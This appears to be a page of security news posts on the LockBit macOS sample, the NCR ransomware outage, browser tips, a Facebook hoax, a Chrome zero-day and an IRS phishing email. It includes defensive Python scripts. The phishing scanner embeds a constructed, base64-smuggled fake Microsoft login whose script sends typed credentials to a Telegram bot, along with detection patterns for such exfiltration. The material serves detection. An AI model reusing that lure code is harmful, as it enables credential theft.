IT NEWS

LockBit ransomware on Mac: Should we worry?

News broke over the weekend that the LockBit ransomware gang had begun targeting Mac users, triggering some concern in the Apple community. But have no fear: Apple security experts have since dissected the sample, looked closely at what it can and cannot do, and concluded that, in its current form, it is toothless.

“Yes, it can indeed run on Apple Silicon. That is basically the extent of its impact,” said Patrick Wardle (@patrickwardle), known macOS cybersecurity expert and founder of the non-profit, Objective-See. “macOS users have nothing to worry about.”

Here’s why.

The signature is invalid

Using the codesign utility, Wardle saw that the payload is only ad-hoc signed: the signature carries no certificate chain back to an Apple Developer ID, and the binary is not notarized. That is not a signature Gatekeeper trusts, so a downloaded (quarantined) copy is refused with a "cannot be opened" dialog rather than executed, unless the user explicitly overrides the block.
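As an added example (not from Wardle's write-up or Objective-See's tooling), here is how that codesign check can be automated and its output classified. The two sample outputs are constructed in the shape `codesign -dvvv` prints; the paths, hashes and team identifier in them are made up.

```python
"""Classify a Mach-O binary's code signature from what `codesign -dvvv` reports.

Added example. It relies on two real details of codesign's output: an ad-hoc
signature is reported as `Signature=adhoc`, and a trusted identity shows up as
`Authority=Developer ID Application: ...` lines. codesign writes this on stderr.
"""
import subprocess


def classify_signature(codesign_output: str) -> str:
    """Map codesign text to one of: unsigned, adhoc, developer-id, other-signed.

    An ad-hoc signature has no certificate chain, so Gatekeeper has nothing to
    verify; a quarantined binary carrying one is refused, not run.
    """
    if "code object is not signed at all" in codesign_output:
        return "unsigned"
    lines = [line.strip() for line in codesign_output.splitlines()]
    if "Signature=adhoc" in lines:
        return "adhoc"
    authorities = [line.split("=", 1)[1] for line in lines if line.startswith("Authority=")]
    if any(a.startswith("Developer ID Application:") for a in authorities):
        return "developer-id"
    return "other-signed"


def inspect_binary(path: str) -> str:
    """Run codesign on a local file and classify it (macOS only; needs codesign on PATH)."""
    proc = subprocess.run(["codesign", "-dvvv", path], capture_output=True, text=True)
    return classify_signature(proc.stderr + proc.stdout)


# Constructed sample: what codesign prints for an ad-hoc signed arm64 binary.
SAMPLE_ADHOC = """\
Executable=/Users/analyst/samples/locker_Apple_M1_64
Identifier=locker_Apple_M1_64
Format=Mach-O thin (arm64)
CodeDirectory v=20400 size=4788 flags=0x2(adhoc) hashes=144+2 location=embedded
Signature=adhoc
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
Internal requirements count=0 size=12
"""

# Constructed sample: a Developer ID signed app (team ID and sizes are invented).
SAMPLE_DEVELOPER_ID = """\
Executable=/Applications/ExampleApp.app/Contents/MacOS/ExampleApp
Identifier=com.example.ExampleApp
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=6200 flags=0x10000(runtime) hashes=182+7 location=embedded
Signature size=8989
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=ABCDE12345
Runtime Version=13.0.0
Sealed Resources version=2 rules=13 files=4
"""

if __name__ == "__main__":
    import sys
    for sample_path in sys.argv[1:]:
        print(sample_path, inspect_binary(sample_path))
```

Two companion checks on a real Mac: `spctl --assess --type execute -vv <path>` prints the Gatekeeper verdict ("rejected" for an ad-hoc signed binary), and `xattr -p com.apple.quarantine <path>` shows whether the file still carries the quarantine attribute that triggers that check. A copy that arrived without the attribute, or that the user has already approved through the dialog, is not stopped by the signature alone.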

If you’re brave enough to run the payload on your macOS, you’ll be met with this message, says Wardle. (Source: Objective-See)

The encryptor is likely a test file

Azim Khodjibaev (@AShukuhi), a security researcher at Cisco Talos, floated the theory to BleepingComputer that the encryptors designed for macOS were “meant as a test and were never intended for development in live cyberattacks.”

Wardle's analysis supports this theory: the malware is far from complete. Indicators in its code suggest it is the group's Linux encryptor compiled for macOS, with only basic configuration settings included. Nothing in the code shows its developers have yet considered macOS's TCC (Transparency, Consent, and Control) or SIP (System Integrity Protection), the two mechanisms that gate access to user data folders and protect system files respectively.

With TCC and SIP in place, the encryptor could touch very little even if it ran: writes to SIP-protected system locations fail outright, and access to TCC-protected folders such as Desktop, Documents and Downloads triggers a consent prompt the user would have to approve. One caveat for defenders: a binary launched from a terminal inherits that terminal's TCC grants, so on a Mac whose Terminal already has Full Disk Access the TCC hurdle disappears.

The code is buggy and will crash

Lending further credence to the test-file theory, Wardle found that the macOS payload contains a buffer overflow bug that makes it crash when executed.


No worries for now!

Apple users can rest easy knowing that this macOS ransomware, as it is now, will hardly impact anyone. However, as Wardle quickly pointed out, this may be different in future releases.

“The fact that a large ransomware gang has apparently set its sights on macOS should give us pause for concern and also catalyze conversations about detecting and preventing this (and future) samples in the first place,” he says in his blog.

With LockBit operating as a ransomware-as-a-service (RaaS) outfit, it has every incentive to offer its affiliates encryptors for as many platforms as possible. It already has at least two Windows offerings: LockBit Black (based on BlackMatter's code) and LockBit Green (based on Conti's code). Expanding to platforms outside its current repertoire is therefore not only logical but strategic.

“For most organizations, the main takeaway is Macs are probably safe, for now, but your Windows servers were always the prime target anyway,” says Malwarebytes Security Evangelist Mark Stockley. However, Mark warned:

“You’re only safe until you’re not, and there’s no timeline on getting this working. We won’t get a warning in advance, we’ll just hear (probably from LockBit itself) that an organization with lots of Macs has been turned over. So…what are you going to do if you have lots of Macs in your organization? Wait for the horse to bolt and then shut the door, or shut the door now?”

In an interview with BleepingComputer, LockBit’s public-facing representative LockBitSupp says the Mac encryptor is “actively being developed.”

LockBit was by far the most dominant ransomware in 2022, and hasn’t slowed down in 2023, which is why it’s one of the five threats you can’t afford to ignore in the Malwarebytes 2023 State of Malware report.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Payment giant’s point-of-sale outage caused by ALPHV ransomware

On April 12, 2023, payment giant NCR reported it was looking into an issue with its point-of-sale (POS) systems that caused an outage, leaving customers unable to use the system.

The NCR Aloha POS systems are popular in hospitality services. Customers include Wendy's, Chuck E. Cheese, Café Rio, Leeann Chin, and FATZ Café. The NCR website claims the company helps over 100,000 restaurants run their operations. The outage primarily caused problems in the US, but some European and Asia Pacific online ordering services were affected as well.

On April 13, NCR determined that the root cause of the outage was a ransomware incident. It then contacted customers, notified law enforcement, and initiated an investigation aided by third-party security experts.

In a statement on April 17, NCR reassured customers it was working hard to quickly restore functionality:

“We are committed to re-establishing secure access to the impacted Aloha and Counterpoint applications as quickly as possible. We are restoring impacted applications in a new secure environment. We will have further updates on the timeline for rebuilding this new environment, and we are targeting this week to bring these applications back online. We will also be contacting customers with a few key steps to access our new environment.”

Although NCR has released no information about the ransomware group responsible, ALPHV, aka BlackCat, is believed to be behind the attack: security researcher Dominic Alvieri spotted a post claiming responsibility on the ALPHV leak site.

ALPHV has since removed the post in which they claimed to have stolen credentials belonging to NCR’s customers and threatened to publish these data if a ransom was not paid.

“We take a lot of credentials to your clients networks used to connect for Insight, Pulse, etc. We will give you this list after payment,”

The ransomware-as-a-service (RaaS) group ALPHV, also known as BlackCat or Noberus, is currently one of the most active. ALPHV was ranked #4 in our list of most prolific ransomware gangs last month.

ALPHV ransomware is used by affiliates who conduct individual attacks, breaching organizations with stolen credentials or by exploiting weaknesses in unpatched Microsoft Exchange servers. During an attack, data is stolen before systems are encrypted, and the victim is asked to pay both for a decryption tool and to prevent the stolen data from being leaked, the double-extortion model that has become standard.


Spring cleaning tips for your browser

When you are resting up from the physical part of your spring cleaning and you’re sitting behind your laptop or swiping left on your phone, why don’t you speed up your browsing experience with a few simple actions?

Let's start with your browser, as that usually has the most impact on your perception of how "fast" your device is. In this post we will focus on the settings for Chrome, since it has the biggest market share, but many browsers (like Edge) have the same settings because they share the Chromium codebase, or very similar ones (Firefox). Where Safari has the same or a similar setting, we mention it in a note prefixed "Safari:".

There may be slight differences in the methodology and screenshots, based on the type of device, the operating system, your language settings, and maybe even the manufacturer of your device, but the basics should be pretty much the same as the Windows-based methods and screenshots shown in this post.

Backups

Before we start let’s take some precautions to minimize the chance of having regrets about our actions afterwards.

1. Backup your currently open bookmarks: More (three dots) > Bookmarks > Bookmark all tabs… (Safari: In the Menu bar > select Bookmarks > then choose Add Bookmarks for these {number of open} Tabs.)

bookmark all open tabs

This will create a Set of bookmarks of the currently open tabs.

You will see a prompt where you can provide a name for this set of bookmarks. Something with the date in it would make it easier to find if you plan to do this more often.

Name that set and save it by clicking the Save button.

type a name for the set of bookmarks

2. Sync keeps your browser data in step across devices, but it also doubles as an off-device backup of that data.

To create a backup click on More (three dots) > Settings > Turn on sync… Then log in to your Google account and access sync settings by clicking on Settings:

turn on synchronization

(Safari: click the Apple menu in the top left corner of your screen. Then click System Preferences > Click iCloud > select the checkbox next to Safari.)

Then select Manage what you sync and turn on Sync everything if it’s disabled, or make a custom selection of what you want to back up.

manage what to synchronize

Once you've decided what to sync, everything you selected is automatically available on any device where you sign in with the same Google account, and if push comes to shove you can use it to restore your browser. Bear in mind that synced passwords and history now live in that Google account, so protect it with two-step verification, and consider setting a sync passphrase (under Encryption options in the sync settings) so the data is encrypted with a key Google doesn't hold. If you were not using sync between devices before you started, you may want to turn it off once you are satisfied everything went well.

Speeding up

1. Check if you have the latest version of Google Chrome. Updates not only introduce new features, they also improve security and fix bugs.

Under More (three dots) > Help > About Google Chrome you can find what version you are on. If there is an update available, Chrome will download and install it. When it’s done you need to relaunch the browser to complete the update. 

update installed, you need to relaunch

Safari: Go to the Apple menu > System Settings > click on Software Update > if updates are available click Restart Now to install them. Once your macOS has updated, Safari will be up to date too.

2. Close some of those tabs that open every time you start your browser. Each site will take some time to load and that slows down your browser. Remember, you can create a set of sites that you need every day and the rest can be moved to your bookmarks so you can always find them.

Now you can start closing tabs and create a set of tabs that you would like to start your sessions with. Once all the unnecessary tabs are closed, click on More (three dots) > Settings > On startup. Select Open a specific page or set of pages.

select your opening tabs

Click on Use current pages and the currently open tabs will be the ones you see at the start of every browser session.

Safari: open the tabs you want to start with and use the method outlined under backups to create a set of bookmarks. Name that set of bookmarks, for example “Startup”. Go to Safari menu > Preferences > select Choose tabs folder from the New windows open with drop-down list. Select the folder of bookmarks (e.g. Startup) you created. Then, click Choose.

3. Under Performance > Memory Saver you can find another way to minimize the impact of your open tabs. When on, Chrome frees up memory from inactive tabs. This gives active tabs and other apps more computer resources and keeps Chrome fast. Your inactive tabs automatically become active again when you go back to them. 

memory saver settings

4. Clean out some clutter you have picked up over time. Click on More (three dots) > Settings > Privacy and security. Click on Clear browsing data. This will open a prompt where you can select which data to clear. The top four are usually the ones you will want to clear. If you are using Chrome as a password manager you will certainly want to leave the fifth one unchecked.

select the data to remove

Cookie warning: if you delete all your cookies, you will have to log in again on several sites, so have your password manager ready or be selective about which cookies to delete. If you uncheck Cookies and other site data here, you can pick which ones to delete under More (three dots) > Settings > Privacy and security > Cookies and other site data > See all site data and permissions. This gives you a complete list and lets you make more granular decisions. Use the trash can icon next to each site's entry to remove its data and permissions.

a more granular approach

Or use the dropdown arrow to have even more options.

Safari: Click the Safari menu > Clear History… > in the Clear field choose All History > click Clear History.

 

5. Browser extensions that you only use occasionally can be disabled until you need them, and extensions you no longer use at all should be removed. Depending on the type of extension, the difference in surfing speed can be noticeable. There is a security payoff too: an extension can read and change every page it has permission for, and abandoned extensions have been sold on and turned malicious in the past, so every one you remove is attack surface gone.

Click More (three dots) > Settings > Extensions to see an overview of the currently installed browser extensions.

installed extensions

The one(s) with the slide to the right (showing blue) are enabled and the one(s) with the slider to the left (showing in grey) are disabled. Any unwanted or no longer needed extensions can be removed by clicking on the Remove button in the extension’s tile.

Safari: Choose Safari > Settings > Extensions. To turn off an extension, deselect its checkbox. To uninstall an extension, select the extension and click the Uninstall button.
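The extensions page shows names and toggles but not what each extension is allowed to do. As an added example (not Google's tooling), the script below reads the extension records from a Chrome profile's "Secure Preferences" file and flags the ones worth a second look. The file layout it assumes (an `extensions.settings` dict keyed by extension ID, each entry with `state`, `from_webstore` and a copy of the manifest) matches recent Chrome profiles but should be verified against your own; the profile paths are the defaults, and the sample data is constructed.

```python
"""Audit the extensions recorded in a Chrome profile's "Secure Preferences" file."""
import json
import os
import sys
from pathlib import Path

# Default-profile locations (assumed; other profiles live in sibling "Profile N" folders).
PROFILE_PATHS = {
    "win32": Path(os.environ.get("LOCALAPPDATA", ".")) / "Google/Chrome/User Data/Default/Secure Preferences",
    "darwin": Path.home() / "Library/Application Support/Google/Chrome/Default/Secure Preferences",
    "linux": Path.home() / ".config/google-chrome/Default/Secure Preferences",
}

# APIs that let an extension observe or rewrite traffic, read cookies, or control other extensions.
HIGH_RISK_APIS = {"webRequest", "webRequestBlocking", "declarativeNetRequest", "cookies",
                  "debugger", "proxy", "nativeMessaging", "management", "history"}
ALL_SITES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_extensions(prefs: dict) -> list[dict]:
    """One record per extension, most-flagged first.

    Assumed layout: prefs["extensions"]["settings"] keyed by extension ID, each entry
    with "state" (1 = enabled, 0 = disabled), "from_webstore" and a "manifest" copy.
    """
    records = []
    for ext_id, entry in prefs.get("extensions", {}).get("settings", {}).items():
        manifest = entry.get("manifest") or {}
        if not manifest:  # placeholder entries without a manifest carry nothing to review
            continue
        perms = set(manifest.get("permissions", []))
        # MV2 lists host patterns under "permissions"; MV3 moves them to "host_permissions".
        hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
        flags = []
        if entry.get("state", 1) != 1:
            flags.append("disabled")            # still installed: remove it if no longer needed
        if not entry.get("from_webstore", False):
            flags.append("not-from-webstore")   # sideloaded or loaded unpacked
        if hosts & ALL_SITES:
            flags.append("all-sites-access")    # can read and change data on every page
        if perms & HIGH_RISK_APIS:
            flags.append("high-risk-api")
        records.append({"id": ext_id, "name": manifest.get("name", "?"),
                        "version": manifest.get("version", "?"), "flags": flags})
    return sorted(records, key=lambda r: (-len(r["flags"]), r["name"]))


def load_prefs(path: Path) -> dict:
    return json.loads(path.read_text(encoding="utf-8"))


# Constructed sample in the assumed layout; IDs and extension names are invented.
SAMPLE_PREFS = {"extensions": {"settings": {
    "abcdefghijklmnopabcdefghijklmnop": {"state": 1, "from_webstore": True,
        "manifest": {"name": "Password Vault", "version": "3.2.1",
                     "permissions": ["storage", "tabs"], "host_permissions": ["<all_urls>"]}},
    "bcdefghijklmnopabcdefghijklmnopa": {"state": 0, "from_webstore": True,
        "manifest": {"name": "Coupon Finder", "version": "1.0.4",
                     "permissions": ["webRequest", "cookies", "*://*/*"]}},
    "cdefghijklmnopabcdefghijklmnopab": {"state": 1, "from_webstore": False,
        "manifest": {"name": "Dev Helper", "version": "0.1",
                     "permissions": ["debugger"], "host_permissions": ["http://localhost/*"]}},
}}}

if __name__ == "__main__":
    path = Path(sys.argv[1]) if len(sys.argv) > 1 else PROFILE_PATHS.get(sys.platform, PROFILE_PATHS["linux"])
    prefs = load_prefs(path) if path.exists() else SAMPLE_PREFS
    for rec in audit_extensions(prefs):
        print(f'{rec["name"]:<24} {rec["version"]:<10} {", ".join(rec["flags"]) or "-"}')
```

Run it with the path to a profile's Secure Preferences file, or with no argument to use the built-in sample. A disabled extension still has its code on disk and can be re-enabled by a single click, which is why it is flagged as a removal candidate rather than ignored.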

6. Preload your pages. Click More (three dots) > Settings > Privacy and security > Cookies and other site data. Here you can turn on Preload pages for faster browsing and searching. Note that preloading fetches pages and resources you haven't clicked on yet, so it sends requests (and cookies) to sites you may never actually visit; if that trade-off bothers you, leave it off.

prefetch settings

7. Scan your device with Malwarebytes to see if any malware is lurking on it. Clearing up any malware on your system is a surefire way to speed it up. And it means you are safer, too!

If you came here looking for a resolution for an extremely slow browser and all of the above didn’t help, there could be other reasons at play. You can try resetting Chrome to default or even uninstall and re-install Chrome.

If a certain site isn’t working properly, you can also try opening the site in an Incognito window. Click More (three dots) and then New Incognito Window. Then copy and paste the URL of the problem site in the address bar and see if it works now. If it does solve the issue, then circle back to point 4 and remove all the cookies and data of the domain that the problem site belongs to.



Avoid this “lost injured dog” Facebook hoax

Facebook users are advised to be wary of posts involving injured dogs receiving treatment at a vet surgery, or pets sitting next to people post-operation adorned with bandages and plaster casts.

The dog-themed missives all follow a similar format, with the primary change between them being the location the post is supposedly coming from. Here’s an example:

Hello. If anyone is looking for this sweet girl, found her lying on the side road in [hashtagged location name]. She was hit by a car in a hit and run incident. I took her to the vet. She is in a critical condition, sustained multiple fractures and on pain relief and oxygen. She is not chipped. I know someone is looking for her. Please bump this post to help me find the owner.

Fake Facebook dog operation post

The images are randomly sourced, with many of the posts reusing the same photographs. Comments are often disabled.

Who is doing this? Well, in terms of the individual accounts on display, they’re a variety of personal accounts with little to no posting history. They’ve either been compromised first and then wiped clean of content, or they’re spam accounts with a recent creation date. The examples we’ve seen strongly suggest the latter.

As for posting tactics, they follow the standard Facebook spam tactic of being posted to local community / classified / real estate groups for maximum exposure. This is something which happens a lot, and was used to great effect in the “dead daughter / free PS5” campaign from the middle of last year.

What, specifically, are these bogus dog in the vet stories for? The scammers are banking on sympathetic engagement off the back of the heartstring tugging tale. With enough engagement, eyeballs, replies, anything at all of value…the posts switch to something else altogether.

This is exactly what was happening back in December with another Facebook scam. There, mostly freshly minted accounts posted up harrowing tales of missing toddlers dumped outside the gates of their homes. Eventually, they would become adverts promoting a variety of decidedly non-missing baby content.

Content switcheroo scams on Facebook are incredibly manipulative, and there's a fair chance such behaviour drives people away from engaging with genuine "missing baby / relative / injured pet" warnings down the line.

There are, however, a few things you can do to keep your Facebook house in order.

Avoiding Facebook hoaxes

  • No replies allowed. Disabled replies can be a major warning flag. If you’re asking for help or giving a warning, why limit the number of people who can reply?
  • If there’s a photograph, try performing a reverse image search. This is where you try to deduce the origin of the image. These scams are lazy; image reuse is rife, often going back many years. There are dedicated sites for this, such as TinEye. There, you either upload an image or provide a URL and TinEye will find any matches from across the internet. Most search engines also offer some reverse image search functionality, though quality of results will inevitably vary. It’s worth noting that sometimes scammers will flip an image (from left to right or vice versa) to try and fool reverse image searches. Deepfaked images will also typically not produce results.
  • Copy / paste that text. Take the text of the suspicious post and search for that, too. You may well find a whole raft of cut and paste efforts across multiple social media portals.
  • Freshly baked scammers. If the site the message or photo is posted to displays details about the person who posted it, see if it’ll let you observe things like account creation date or if the name on the account has been altered. A new account with no other content has likely been set up to scam people.


Update Chrome now! Google patches actively exploited flaw

In a recent security advisory, Google says it has patched a high-severity zero-day flaw in its Chrome browser, the first of 2023, that is being exploited in the wild. The company urges all Windows, Mac, and Linux users to update to version 112.0.5615.121 immediately, as every earlier version is affected. Updating can be done manually or automatically.

If you use other Chromium-based browsers, you may need to update them as well.

The vulnerability, tracked as CVE-2023-2033, is triggered when a user visits a malicious webpage with an unpatched Chrome browser. The page can run arbitrary code inside the browser's renderer process, which, chained with a sandbox escape, can lead to the device being hijacked. Google says it is aware that an exploit for this flaw exists in the wild.

CVE-2023-2033 is a type-confusion bug in V8, Google's open-source JavaScript and WebAssembly engine. As is usual for zero-day patch announcements, the company supplied little detail on how attackers are exploiting the flaw. V8 bugs are, however, the most common class of exploited Chrome zero-days and among the most dangerous: a crash is merely the benign outcome of a type confusion, while a working exploit turns it into memory corruption and arbitrary code execution in the renderer process, usually chained with a second bug to escape the sandbox.

“Access to bug details and links may be kept restricted until a majority of users are updated with a fix,” says Google in the advisory. “We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.”

Google is giving all its Chrome users enough time to update to the latest version until technical details are released.
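Fleet managers usually want to know which clients are still below the fixed version. As an added example (not from Google's advisory, which supplies only the version number 112.0.5615.121), the script below classifies browsers from web-server access logs. It handles a caveat that trips people up: since Chrome's User-Agent reduction the UA string reports only the major version (for example `Chrome/112.0.0.0`), so the full version must come from the `Sec-CH-UA-Full-Version-List` client hint, which the server only receives if it asked for it via `Accept-CH`. The log lines are constructed.

```python
"""Find clients on a Chrome build older than the fix for CVE-2023-2033 in access logs."""
import re
from collections import Counter
from typing import Optional

FIXED_VERSION = (112, 0, 5615, 121)   # first fixed version, from the advisory

UA_CHROME_RE = re.compile(r"\bChrome/(\d+)\.(\d+)\.(\d+)\.(\d+)")
# Sec-CH-UA-Full-Version-List: "Chromium";v="112.0.5615.121", "Google Chrome";v="112.0.5615.121", ...
FULL_VERSION_RE = re.compile(r'"(?:Google Chrome|Chromium)";v="(\d+)\.(\d+)\.(\d+)\.(\d+)"')
# Other Chromium-based browsers carry a Chrome/ token too but ship fixes on their own schedule.
OTHER_CHROMIUM_RE = re.compile(r"\b(?:Edg|OPR|Brave|Vivaldi)/")


def chrome_version(user_agent: str, full_version_list: Optional[str] = None):
    """Return (version_tuple, exact); exact is False when only the major version is reliable."""
    if full_version_list:
        m = FULL_VERSION_RE.search(full_version_list)
        if m:
            return tuple(int(x) for x in m.groups()), True
    m = UA_CHROME_RE.search(user_agent)
    if not m:
        return None, False
    version = tuple(int(x) for x in m.groups())
    # Reduced UA: minor, build and patch are zeroed and cannot be compared against the fix.
    if version[1:] == (0, 0, 0):
        return version, False
    return version, True


def classify(user_agent: str, full_version_list: Optional[str] = None) -> str:
    if OTHER_CHROMIUM_RE.search(user_agent):
        return "other-chromium"     # check that vendor's advisory instead
    version, exact = chrome_version(user_agent, full_version_list)
    if version is None:
        return "not-chrome"
    if version[0] != FIXED_VERSION[0]:
        return "vulnerable" if version[0] < FIXED_VERSION[0] else "patched"
    if not exact:
        return "unknown-major-only"  # same major as the fix; need client hints to decide
    return "patched" if version >= FIXED_VERSION else "vulnerable"


def triage(lines) -> Counter:
    """Count verdicts over combined-format log lines; the User-Agent is the last quoted field."""
    counts: Counter = Counter()
    for line in lines:
        quoted = re.findall(r'"([^"]*)"', line)
        counts[classify(quoted[-1] if quoted else "")] += 1
    return counts


# Constructed access-log lines in combined format (hosts, times and versions are invented).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Apr/2023:09:12:01 +0000] "GET /intranet/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.147 Safari/537.36"',
    '10.0.0.6 - - [18/Apr/2023:09:12:05 +0000] "GET /intranet/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"',
    '10.0.0.7 - - [18/Apr/2023:09:12:09 +0000] "GET /intranet/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36"',
    '10.0.0.8 - - [18/Apr/2023:09:12:14 +0000] "GET /intranet/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48"',
    '10.0.0.9 - - [18/Apr/2023:09:12:20 +0000] "GET /intranet/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/112.0"',
]

if __name__ == "__main__":
    for verdict, n in sorted(triage(SAMPLE_LOG).items()):
        print(f"{verdict:<20} {n}")
```

A large "unknown-major-only" bucket is the signal to add `Accept-CH: Sec-CH-UA-Full-Version-List` to the intranet server's responses, or to take the version from the endpoint inventory instead of the logs.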

How to manually update Chrome

Google Chrome typically updates automatically. However, it’s worth double checking. To check if your browser is up to date:

  • Click the three vertical dots at the upper right-hand side of the URL bar.
  • Select Help > About Google Chrome.

Simply doing this should trigger Chrome to update. Once done, the browser will ask you to relaunch. Click the button to confirm and complete the update process.

Google does not ask users to download and run a separate installer to update Chrome; updates arrive through the browser's own update mechanism, as described above. Scammers have long abused fake "Chrome update" downloads to deliver malware, and the tactic resurfaces in malicious campaigns now and then to catch people who aren't familiar with how Chrome updates itself. If a website or email tells you to download a file to update Chrome, close it.

Stay safe!



Beware: Fake IRS tax email wants your Microsoft account

Last week, the IRS reminded taxpayers that Tax Day, April 18, falls on Tuesday this week, although it has extended filing deadlines in parts of states such as Alabama, California, and New York that were hit by natural disasters. Those extensions give scammers a reason to keep running tax-themed campaigns even after tomorrow's deadline has passed for most Americans.

Just a few weeks ago, we wrote about a fake IRS tax email carrying a malware payload: Emotet. Now, our Senior Director of Threat Intelligence, Jerome Segura, has found an email with the title “IRS Notice of intent to seize (Levy) Your Property or rights to property”, which was purportedly sent by “Tax IRS 152”.

The email, with an HTML file attachment, contains a short message:

Please note: [redacted]

<=> For information please continue to check here or use our free mobile app. Updates status are made no more than once a day.

Opening the attached HTML file reveals a page imitating a Microsoft sign-in form. According to Segura, whatever is typed into it is sent to a Telegram channel via a bot. Don't enter your credentials, especially if the Microsoft account is tied to a business: a hijacked account is a foothold for further attacks. If you already did, change the password and review the account's recent sign-in activity; MFA limits the damage, but it does not make a leaked password harmless.
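Mail gateways and analysts can triage an HTML attachment like this one without opening it in a browser. As an added example (not Malwarebytes' detection logic), the script below unwraps one layer of base64 smuggling, looks for a password form that is branded as Microsoft but does not submit to Microsoft, and looks for the Telegram Bot API URL shape (`https://api.telegram.org/bot<token>/<method>`) that such kits use for exfiltration. The sample attachment is constructed in the block and its bot token is fake.

```python
"""Triage an HTML email attachment for a smuggled credential-phishing form with Telegram exfil."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TELEGRAM_BOT_RE = re.compile(r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")
ATOB_BLOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=\s]{40,})['\"]\s*\)")
BRAND_RE = re.compile(r"microsoft|office\s?365|outlook|onedrive", re.I)
MICROSOFT_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com", "login.microsoft.com"}


class _FormCollector(HTMLParser):
    """Collect form actions and count password inputs in one HTML layer."""

    def __init__(self) -> None:
        super().__init__()
        self.form_actions: list[str] = []
        self.password_fields = 0

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_fields += 1


def scan_html(html: str) -> dict:
    findings: list[str] = []
    layers = [html]
    # Unwrap one layer of HTML smuggling: document.write(atob("...")) and similar.
    for blob in ATOB_BLOB_RE.findall(html):
        try:
            decoded = base64.b64decode(re.sub(r"\s", "", blob), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue
        if "<" in decoded:
            findings.append("base64-smuggled-html")
            layers.append(decoded)
    for layer in layers:
        for m in TELEGRAM_BOT_RE.finditer(layer):
            # Keep the bot ID for correlation but never log the secret part of the token.
            findings.append(f"telegram-bot-exfil:bot{m.group(1)}:<redacted>/{m.group(3)}")
        collector = _FormCollector()
        collector.feed(layer)
        if collector.password_fields:
            offsite = [a for a in collector.form_actions if urlparse(a).hostname not in MICROSOFT_LOGIN_HOSTS]
            if offsite or not collector.form_actions:     # relative, empty or JS-driven submission
                findings.append("password-form-not-microsoft")
            if BRAND_RE.search(layer):
                findings.append("microsoft-branded-login")
    findings = list(dict.fromkeys(findings))              # dedupe, keep order
    exfil = any(f.startswith("telegram-bot-exfil") for f in findings)
    lure = {"password-form-not-microsoft", "microsoft-branded-login"} <= set(findings)
    verdict = "phishing-likely" if exfil or lure else ("suspicious" if findings else "clean")
    return {"verdict": verdict, "findings": findings}


# Constructed lure page: Microsoft-branded sign-in form whose submit handler posts to a Telegram bot.
INNER_PAGE = """<html><body>
<h2>Microsoft</h2><p>Sign in to view your IRS notice</p>
<form id="f" action="#">
  <input name="email" type="email"><input name="pass" type="password">
  <button type="submit">Sign in</button>
</form>
<script>
document.getElementById('f').onsubmit = function (e) {
  e.preventDefault();
  var msg = 'user=' + this.email.value + ' pass=' + this.pass.value;
  fetch('https://api.telegram.org/bot123456789:AAFakeTokenForThisExampleOnly/sendMessage?chat_id=-100123&text=' + encodeURIComponent(msg));
};
</script></body></html>"""

# Constructed attachment: the lure is delivered base64-encoded and written into the DOM at runtime.
SAMPLE_ATTACHMENT = ('<html><body><script>document.write(atob("'
                     + base64.b64encode(INNER_PAGE.encode()).decode() + '"));</script></body></html>')

if __name__ == "__main__":
    print(scan_html(SAMPLE_ATTACHMENT))
```

The bot ID in a finding is worth keeping: it is stable across a campaign's lures and is the same one appearing in the outbound request your proxy logs would show if a victim submitted the form.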


Avoiding tax scams

Here are some ways you can outsmart tax fraudsters and keep one step ahead of the phishing, malware, and social engineering attacks that come around every year during tax season.

  • File early. One of the quickest ways to stumble into a trap is to leave filing your tax return until the last minute. That added pressure can mean responding to fake emails you otherwise would have ignored.
  • Be careful around suspicious refunds. Tax agencies have a proper process for issuing refunds, as found on their websites. Some, like HMRC, are very clear that refunds are never issued by email. If in doubt, phone the tax office directly and ask if what you have is the real deal or a fake.
  • Beware of fake bank portals. Some tax scams will ask you who you bank with, and then open up a phishing page for that bank. Always navigate directly to your banking website; click-throughs and redirects from an email or text typically spell danger.
